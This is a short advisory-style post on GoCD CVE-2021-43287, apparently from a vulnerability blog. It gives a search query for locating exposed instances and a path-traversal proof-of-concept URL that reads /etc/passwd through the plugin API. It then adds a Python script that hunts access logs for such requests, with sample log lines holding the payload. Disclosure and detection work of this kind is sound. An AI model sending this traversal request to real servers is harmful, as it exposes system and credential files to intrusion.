GoCD plugin arbitrary file reading vulnerability CVE-2021-43287
Vulnerability Description
The pluginName parameter of the GoCD plugin API is vulnerable to arbitrary file read, which allows an attacker to obtain any sensitive information on the server.
Vulnerability Impact
GoCD
Network asset mapping query
title="Create a pipeline - Go"
Vulnerability reproduction
Main page
Verify POC
/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd
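For defenders, the request above can be hunted in web or reverse-proxy access logs. The following is an added example, not part of the original post or of GoCD: it assumes combined-format access logs, the function names are hypothetical, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint path taken from the PoC above.
ENDPOINT = "/go/add-on/business-continuity/api/plugin"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def is_traversal(value):
    """True if a parameter value escapes its directory after repeated URL-decoding."""
    for _ in range(3):  # unwrap up to three further layers of percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("\\", "/")  # treat Windows separators the same way
    return ".." in value.split("/") or value.startswith("/")

def suspicious_requests(log_lines):
    """Return (client, target, status) for endpoint requests carrying traversal."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if url.path.rstrip("/") != ENDPOINT:
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
        values = params.get("pluginName", []) + params.get("folderName", [])
        if any(is_traversal(v) for v in values):
            hits.append((line.split()[0], m.group("target"), int(m.group("status"))))
    return hits

# Constructed sample access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Nov/2021:10:00:01 +0000] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd HTTP/1.1" 200 1843',
    '203.0.113.7 - - [01/Nov/2021:10:00:02 +0000] "GET /go/add-on/business-continuity/api/plugin?folderName=&pluginName=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0',
    '198.51.100.4 - - [01/Nov/2021:10:00:05 +0000] "GET /go/add-on/business-continuity/api/plugin?folderName=example&pluginName=example-plugin.jar HTTP/1.1" 200 90211',
    '198.51.100.4 - - [01/Nov/2021:10:00:09 +0000] "GET /go/pipelines HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for client, target, status in suspicious_requests(SAMPLE_LOG):
        print(f"{client} status={status} {target}")
```

A hit with a 200 status deserves priority in triage, since the server likely returned the requested file.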
This post is licensed under CC BY 4.0 by the author.